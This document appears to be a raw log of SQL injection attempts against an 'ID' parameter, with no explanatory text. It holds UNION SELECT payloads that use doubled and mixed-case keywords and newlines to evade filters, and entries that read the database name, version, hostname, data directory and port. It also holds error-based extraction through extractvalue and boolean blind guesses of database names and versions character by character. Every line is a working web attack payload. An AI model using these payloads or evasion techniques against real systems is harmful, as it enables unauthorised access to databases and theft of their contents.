ID:1
ID:1\
ID:1' union select 1,2,3 -- 
ID:1' Union select 1,2,3 -- 
ID:1' UnIon select 1,2,3 -- 
ID:1' uniunionon select 1,2,3 -- 
ID:1' uniunionon seselectlect 1,2,3 -- 
ID:1' uniunionon seselectlect 1,2,3
ID:1' uniunionon seselectlect 1,2,3 #
ID:1' uniunionon seselectlect 1,2,3
--

ID:1' uniunionon Select 1,2,3
--

ID:1' uniunionon all Select 1,2,3
--

ID:1' uniunionon  selSelectect 1,2,3
--

ID:1' uniunionon
  selSelectect 1,2,3
--

ID:1' uniunionon
  selSelectect
 1,2,3
--

ID:1' 
uniunionon
  selSelectect
 1,2,3
--

ID:1' 
uniunionon
  selSelectect
 1,2,3
OR '1
ID:-1' 
uniunionon
  selSelectect
 1,2,3
OR '1
ID:99' 
uniunionon
  selSelectect
 1,2,3
OR '1
ID:99' 
uniunionon
  selSelectect
 database(),2,3
OR '1
ID:99' 
uniunionon
  selSelectect
 1,database(),3
OR '1
ID:99' 
uniunionon
  selSelectect
 1,version(),3
OR '1
ID:99' 
uniunionon
  selSelectect
 1,@@hostname,3
OR '1
ID:99' 
uniunionon
  selSelectect
 1,@@datadir,3
OR '1
ID:99' 
uniunionon
  selSelectect
 1,@@port,3
OR '1
ID:1
ID:1'
ID:1' and 1=1
ID:1' and 1=1 
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='a')='1
ID:1
ID:1
ID:2
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left(database(),1)='s')='1
ID:1'=(left(database(),1)='b')='1
ID:1'=(left(database(),1)='a')='1
ID:1'=(left(database(),1)='d')='1
ID:1'=(left(database(),1)='g')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((select(group_concat(@@version))),1)='5')='1
ID:1'=(left((selectselect(group_concat(@@version))),1)='5')='1
ID:1'=(left((selectselect(group_concat(@@version))),1)='5')='1
ID:1'=(left((selectselect(group_concat(@@version))),1)='5')='1
ID:1'=(left((selectselect(group_concat(@@version))),1)='5')='1
ID:1'=(left((selecT(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1
ID:1select
ID:1selecta
ID:1selecT
